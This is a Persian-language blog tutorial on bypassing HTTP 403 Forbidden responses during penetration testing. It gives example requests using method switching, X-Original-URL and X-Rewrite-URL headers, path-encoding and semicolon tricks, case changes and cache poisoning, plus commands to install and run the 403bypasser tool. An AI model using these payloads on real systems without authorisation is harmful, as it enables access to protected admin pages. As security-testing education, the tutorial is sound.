روش های بایپس 403 Forbidden

مقالات آموزشی ، وبلاگ
ارسال شده توسط
1402/08/11
440 بازدید

سلام. بهروز منصوری هستم و با روش های بایپس 403 Forbidden در خدمتتون هستم.

روش های بایپس forbidden 403

خطای 403 Forbidden زمانی رخ می دهد که شما اجازه دسترسی به یک صفحه وب یا چیز دیگری را در وب سرور ندارید.

خیلی وقت ها پیش می آید که شما در حال پیدا کردن آسیب پذیری روی هدف خود هستید و در حین انجام دادن به عمق هدف می روید. با ارور 403 Forbidden یا Permission Denied برخورد می کنید.

حالا اگر بتوانید آن را دور بزنید، در بیشتر مواقع می توانید صفحه مدیریت هدف یا هر صفحه با اهمیت بالای دیگری را ببینید و می توانید روی آن تست نفوذ انجام دهید.

امروز روش های مختلف بایپس این ارور رو با هم کار میکنیم.

 

روش های دستی

دستکاری متد درخواست: درخواست GET را به درخواست POST تبدیل کنید.

GET /admin HTTP/1.1
Host: target.com

 

POST /admin HTTP/1.1
Host: target.com

 

نادیده گرفتن url وب سایت از طریق هدرهای غیر استاندارد: X-Original-URL & X-Rewrite-URL

GET /admin HTTP/1.1
Host: target.com

 

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin

 

اضافه کردن 2e% بعد از اولین اسلش:

http://target.com/admin => 403

 

http://target.com/%2e/admin => 200

 

نقطه (.) اسلش (/) و نقطه ویرگول (;) را در URL اضافه کنید:

http://target.com/admin => 403

 

http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/.. => 200
http://target.com/;/admin => 200
http://target.com/.;/admin => 200
http://target.com//;//admin => 200

 

“..;/” را بعد از نام دایرکتوری اضافه کنید:

http://target.com/admin

 

http://target.com/admin..;/

سعی کنید بعضی از حروف URL را با حروف بزرگ بنویسید:

http://target.com/admin

http://target.com/aDmIN

 

از Web Cache Poisoning استفاده کنید:

GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin

 

دستکاری کردن ورژن HTTP

bypass 403

بایپس ارور ۴۰۳

 

بایپس اتوماتیک

ابزار 403bypasser

آموزش ابزار 403bypasser

دستورات نصب:

git clone https://github.com/yunemse48/403bypasser.git

pip install -r requirements.txt

 

دستور کار با برنامه:

python3 403bypasser.py -u https://target.com -d xyz

 

در این دستور -u برای URL مورد نظر شما و -d برای مسیری است که 403 ممنوعه را به شما نشان می دهد و می خواهید از آن عبور کنید.

بایپس ۴۰۳ با 403bypasser

بایپس ۴۰۳ با 403bypasser

 

ابزار bypass-403

ابزار دیگری که برای سرعت بخشیدن به روند بررسی بسیار مفید است، Bypass-403 است.

بایپس ارور ۴۰۳

قطعاً این ها تنها روش های بایپس 403 Forbidden نیستند و روش های دیگری نیز وجود دارد که سعی میکنم به مرور این مقاله را به روز رسانی کنم.

برچسب ها: